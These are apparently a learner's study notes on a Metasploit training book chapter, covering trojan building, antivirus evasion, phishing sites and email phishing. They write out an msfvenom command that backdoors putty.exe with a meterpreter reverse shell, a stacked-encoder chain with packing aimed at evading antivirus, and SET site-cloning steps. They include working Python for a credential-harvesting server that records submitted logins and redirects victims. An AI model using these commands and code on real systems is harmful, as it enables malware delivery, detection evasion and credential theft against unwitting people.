Study notes on Chapter 7 of 《Metasploit魔鬼训练营》 (Metasploit Penetration Testing Training Camp)
P314 Building a trojan program
msfpayload and msfencode have been replaced by msfvenom. Run msfvenom -h for the full usage; the following page also has a tutorial:
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
Embed the windows/meterpreter/reverse_tcp payload into putty.exe (-x uses it as the template, -k keeps the template's original functionality), producing the trojanized executable putty_backdoor.exe.
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.132 LPORT=80 -e x86/shikata_ga_nai -f exe -i 5 -x /root/example/putty.exe -k -o putty_backdoor.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai chosen with final size 468
Payload size: 468 bytes
Saved as: putty_backdoor.exe
Start a handler (exploit/multi/handler with the same payload, LHOST and LPORT), run the generated putty_backdoor.exe on the target, and a session comes back:
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 10.10.10.132:80
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 10.10.10.130
[*] Meterpreter session 1 opened (10.10.10.132:80 -> 10.10.10.130:3498) at 2016-04-05 20:36:32 +0800
meterpreter > sysinfo
Computer        : ROOT-TVI862UBEH
OS              : Windows .NET Server (Build 3790).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
Embarrassingly, even though I was working inside a VM, the Windows Defender on my host kept deleting the malicious files I generated. (I had to turn it off for the time being.)
In practice, to get past antivirus, the encoders can be chained, with each later msfvenom taking the previous one's raw output on stdin:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.132 LPORT=80 -a x86 --platform windows -e x86/shikata_ga_nai -i 5 \
-f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 2 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 \
--platform windows -i 5 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 5 -f exe -x /root/example/putty.exe \
-k -o /root/example/payload08.exe
Adding it up: 5 passes of x86/shikata_ga_nai, 2 of x86/alpha_upper, 5 more of x86/shikata_ga_nai and 5 of x86/countdown, 17 passes in all!
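What an iteration count actually buys is easier to see with a model. The Python below is an added example, not code from the book, this post or Metasploit: it imitates one encoder pass as a fixed-size placeholder "decoder stub" (a marker plus the key, no real x86 code) followed by the body XOR-encoded under an additive-feedback key, modelled on the scheme shikata_ga_nai uses (the exact key-update rule here is my assumption). Nesting it five times over a constructed 333-byte input reproduces the 360/387/414/441/468 size sequence in the msfvenom output above, and shows that every layer, however deep, begins with the same stub.

```python
import random

STUB_SIZE = 27          # growth per shikata_ga_nai pass in the msfvenom output above
MAGIC = b"STUB"         # placeholder marker standing in for the real x86 decoder code
FILLER = STUB_SIZE - len(MAGIC) - 4   # stub bytes left after the marker and the 4-byte key


def _xor_feedback(data: bytes, key: int, plaintext_in: bool) -> bytes:
    """XOR `data` with a running 32-bit key, one dword at a time.

    After each dword the key absorbs the *plaintext* dword (additive feedback;
    assumed here to be the rule shikata_ga_nai's decoder loop applies), so one
    wrong key byte corrupts everything after it. A short final chunk is XORed
    with the low bytes of the key, so output length equals input length.
    `plaintext_in` says whether `data` is plaintext (encoding) or ciphertext
    (decoding).
    """
    out = bytearray()
    for i in range(0, len(data), 4):
        chunk = data[i:i + 4]
        key_bytes = key.to_bytes(4, "little")[:len(chunk)]
        xored = bytes(a ^ b for a, b in zip(chunk, key_bytes))
        plain = chunk if plaintext_in else xored
        out += xored
        key = (key + int.from_bytes(plain, "little")) & 0xFFFFFFFF
    return bytes(out)


def encode_once(payload: bytes, key: int) -> bytes:
    """One encoder pass: placeholder decoder stub (marker, key, filler) + encoded body."""
    stub = MAGIC + key.to_bytes(4, "little") + b"\x90" * FILLER
    return stub + _xor_feedback(payload, key, plaintext_in=True)


def decode_once(blob: bytes) -> bytes:
    """Undo one pass: pull the key out of the stub and decode what follows it."""
    if not blob.startswith(MAGIC):
        raise ValueError("no decoder stub at offset 0")
    key = int.from_bytes(blob[len(MAGIC):len(MAGIC) + 4], "little")
    return _xor_feedback(blob[STUB_SIZE:], key, plaintext_in=False)


def encode(payload: bytes, iterations: int, seed: int = 1) -> list:
    """Nest `iterations` passes, like `msfvenom -i N`, and return every
    intermediate blob so the per-pass sizes can be compared with real output."""
    rng = random.Random(seed)   # seeded so the keys are reproducible
    layers, blob = [], payload
    for _ in range(iterations):
        blob = encode_once(blob, rng.getrandbits(32))
        layers.append(blob)
    return layers


def decode(blob: bytes, iterations: int) -> bytes:
    for _ in range(iterations):
        blob = decode_once(blob)
    return blob


def demo(payload_len: int = 333, iterations: int = 5) -> dict:
    """Constructed input: 333 bytes of 0x41, the bare stager size implied by the
    output above (360 at iteration 0, minus the 27-byte stub)."""
    payload = b"\x41" * payload_len
    layers = encode(payload, iterations)
    return {
        "sizes": [len(layer) for layer in layers],            # 360, 387, 414, 441, 468
        "round_trip_ok": decode(layers[-1], iterations) == payload,
        "stub_visible": all(layer.startswith(MAGIC) for layer in layers),
    }


if __name__ == "__main__":
    print(demo())
```

The point for the evasion discussion: iterating only changes the encoded body, while what an engine meets at the entry point is always a decoder loop. Real shikata_ga_nai stubs are polymorphic, but their structure is well known and engines emulate or pattern-match them, which is why stacking four encoders for 17 passes, as above, still leaves most scanners flagging the file.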
To test the file's "immunity", upload it to the site below. Note that anything uploaded to VirusTotal is shared with the vendors, so a sample you intend to use in an engagement is burned the moment you upload it:
https://www.virustotal.com/en/
Result: 31 of 56 antivirus engines detected it; the ones that missed it included Tencent, Kingsoft and Baidu. Heh!
Packing for "AV evasion"
root@kali:~/example# upx -6 -o putty_backdoor_upx6.exe putty_backdoor.exe
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: putty_backdoor.exe: CantPackException: superfluous data between sections

Packed 1 file: 0 ok, 1 error.
It failed. I couldn't find a fix for this online.
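The UPX message describes a checkable condition: raw section data that is not laid out contiguously on disk. The checker below is an added example, not code from the book, this post or UPX; it walks a PE file's section table with only the standard library and reports every on-disk byte range no section claims, tolerating the padding up to the next FileAlignment boundary that the format allows. `build_pe` constructs a minimal PE32 image (headers and section table only, not runnable) so the checker can be exercised offline; the section names, sizes and 0x200 alignment are assumptions made for the example.

```python
import struct

FILE_ALIGN = 0x200   # assumed FileAlignment for the constructed image


def build_pe(sections, gap_after=None, gap_size=0, overlay=b"", file_align=FILE_ALIGN):
    """Constructed test input: a minimal PE32 image with just the headers and
    section table the checker reads. `sections` is a list of (name, size); raw
    data is laid out back to back with SizeOfRawData rounded up to `file_align`,
    as a linker would. `gap_after=i` leaves `gap_size` unclaimed bytes after
    section i; `overlay` is appended after the last section."""
    n = len(sections)
    opt_size = 224                                         # PE32 optional header size
    hdr_size = 64 + 4 + 20 + opt_size + 40 * n             # DOS + "PE\0\0" + COFF + optional + table
    raw_ptr = -(-hdr_size // file_align) * file_align      # first section on an alignment boundary
    table, blobs, rva = b"", [], 0x1000
    for i, (name, size) in enumerate(sections):
        raw_size = -(-size // file_align) * file_align
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             size, rva, raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
        blobs.append((raw_ptr, bytes([0x41 + i]) * raw_size))
        rva += -(-size // 0x1000) * 0x1000
        raw_ptr += raw_size + (gap_size if gap_after == i else 0)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)       # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<II", opt, 32, 0x1000, file_align)   # SectionAlignment, FileAlignment
    img = bytearray(dos + b"PE\0\0" + coff + bytes(opt) + table)
    for ptr, data in blobs:
        img += b"\0" * (ptr - len(img))                    # header padding, or the deliberate gap
        img += data
    return bytes(img) + overlay


def section_layout(pe: bytes):
    """Decode the few header fields the gap check needs: FileAlignment and, for
    every section with raw data, (name, PointerToRawData, SizeOfRawData),
    sorted by file offset."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt_off = e_lfanew + 24
    file_align = struct.unpack_from("<I", pe, opt_off + 36)[0]   # same offset in PE32 and PE32+
    secs = []
    for i in range(nsec):
        name, _vsize, _rva, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", pe, opt_off + opt_size + 40 * i)
        if raw_size:                                          # skip .bss-style sections with no file data
            secs.append((name.rstrip(b"\0").decode(), raw_ptr, raw_size))
    return file_align, sorted(secs, key=lambda s: s[1])


def find_gaps(pe: bytes):
    """Return [(after, start, end)] for every on-disk byte range no section
    claims. `after` names the section preceding the gap, or is 'overlay' for
    data past the last section. Padding up to the next FileAlignment boundary
    is tolerated because the format itself allows it."""
    file_align, secs = section_layout(pe)
    gaps = []
    for i, (name, ptr, size) in enumerate(secs):
        end = -(-(ptr + size) // file_align) * file_align
        last = i + 1 == len(secs)
        nxt = len(pe) if last else secs[i + 1][1]
        if nxt > end:
            gaps.append(("overlay" if last else name, end, nxt))
    return gaps


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:
        for after, start, end in find_gaps(f.read()):
            print(f"{end - start:#x} unclaimed bytes at {start:#x}-{end:#x} after {after}")
```

Run it over putty_backdoor.exe and over the clean putty.exe and compare: -k keeps the template working by adding the stager as an extra section instead of overwriting .text, and the output shows which boundary that section's raw data fails to line up with, which is what UPX 3.91 is refusing.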
P326 Building a phishing site:
Open SET and choose, in order, Social-Engineering Attacks -> Website Attack Vectors -> Credential Harvester Attack Method -> Site Cloner, then enter the attacker's IP address and the URL of the page to clone. Make sure the apache2 service is running first!
When the target browses to http://10.10.10.128/ and enters a username and password, they are captured on the listening attacker machine:
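The mechanism behind the Credential Harvester option, stripped to its essentials, as an added example that is not SET's code or the book's: a small HTTP server serves a cloned login form, records whatever is POSTed to it, and then redirects the victim to the genuine site so the page appears to have "worked". The form, the field names, the redirect target (https://example.com/login) and the submitted credentials are all constructed for this example, and the server binds an ephemeral localhost port rather than port 80.

```python
import http.client
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

REAL_SITE = "https://example.com/login"   # assumption: the genuine site the victim is bounced to
LOGIN_FORM = b"""<html><body>
<form method="post" action="/">
  <input name="username"> <input name="password" type="password">
  <input type="submit" value="Sign in">
</form></body></html>"""                    # constructed stand-in for a cloned login page

captured = []   # (client_ip, {field: value}) per POST; SET keeps an equivalent harvester log


class Harvester(BaseHTTPRequestHandler):
    def do_GET(self):
        """Serve the cloned page to anyone who follows the phishing link."""
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(LOGIN_FORM)))
        self.end_headers()
        self.wfile.write(LOGIN_FORM)

    def do_POST(self):
        """Record the submitted fields, then 302 to the real site so the victim
        just sees the genuine login page and assumes a typo."""
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length).decode("utf-8", "replace")
        fields = {k: v[0] for k, v in urllib.parse.parse_qs(body).items()}
        captured.append((self.client_address[0], fields))
        self.send_response(302)
        self.send_header("Location", REAL_SITE)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass   # keep stdout quiet; `captured` is the record that matters


def start_harvester(host="127.0.0.1", port=0):
    """Serve on a background thread; port 0 lets the OS pick a free port."""
    srv = HTTPServer((host, port), Harvester)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def simulate_victim(port: int, username: str, password: str) -> int:
    """Stand-in for the target's browser submitting the form; returns the HTTP status."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    body = urllib.parse.urlencode({"username": username, "password": password})
    conn.request("POST", "/", body=body,
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp.status


def run_demo():
    """Start the harvester, submit constructed credentials, return (status, records)."""
    srv = start_harvester()
    try:
        status = simulate_victim(srv.server_address[1], "alice", "hunter2")
    finally:
        srv.shutdown()
        srv.server_close()
    return status, list(captured)


if __name__ == "__main__":
    print(run_demo())
```

The redirect is the part worth noticing when reading SET's own output: the victim never sees an error page, only the real login form a second time, which is why the technique is reported so rarely. Serving a real clone from port 80 is what the apache2 requirement above is about.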
P332 Email phishing:
The generated PDF is in /root/.set/. Following the steps and choosing to send it via Gmail at the end, it failed:
Probably because Gmail detected the payload in the attachment. So it's best to run it through msfencode (now msfvenom) or similar for some "AV evasion" first!